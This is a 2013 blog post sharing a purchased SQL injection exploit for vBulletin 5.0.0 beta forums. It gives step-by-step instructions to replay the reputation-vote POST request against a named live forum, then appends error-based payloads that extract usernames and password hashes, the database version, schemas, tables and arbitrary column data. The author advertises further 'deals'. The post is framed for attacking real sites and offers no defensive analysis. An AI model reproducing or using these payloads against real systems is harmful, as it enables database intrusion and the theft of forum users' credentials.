Tuesday, 16 July 2013

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day (Priv8)

01:34  , , ,  No comments

1337 မွာ $ 300 နဲ ့ေရာင္းထားတာေလးပါ  :)
http://www.priv8.1337day.com/exploit/description/20002
vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Dork: Powered by vBulletin™ Version 5.0.0 Beta (or) Use ur Brain you'll get more o_O

 Step 1
Create an Account on vBulletin forum Verify the account and Activate it
For Demo we will use this Forum
Link = http://www.prospectrush.com/new_forum/
I have alredy made an account so i wil direct login

 Step 2
go to/Open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/addon/live-http-headers/) << download from here
and then on the Topic page search for "Like" button and Clik on it ....
then the Http responce would be caught on HTTP HEaders addon
Step 3
Go to the first POST in HTTP Headers ,it will look like this
POST *Something /ajax/api/reputation/vote HTTP/1.1
select it and click on Replay button
Step 4
Then go on Send POST Content and use below Query ,
just add the Below Query after "noteid=somenumber"
=======================
SQL Query
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
=======================
The Above SQLi command will fetch out the first record from user table(username/password)
see the username and pass in encrypted get the salt to and decrypt it i wont show decrypting use your brain :)

 =============
Greets to Real Author , All Indian & Pakistani Brothers , 1337day , ashiyane forums & All Indian Hacking Groups
//Note : Those Brothers who have my mail id can Contact me for other Deals
Offer Valid till 29th March 2013
Regards
./NoTty_rAJ
Thanks

 [#Other SQLi Syntaxes]
*********************************************************************************************************************
|Version():
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

 *********************************************************************************************************************
|User():
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

 *********************************************************************************************************************
|Database():
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

 *********************************************************************************************************************
|Database Print:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Table Count:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Print Tables:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Columns of selected table:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Fetch Out Data:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

 Greetz to HeXagone  & Raw-X

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)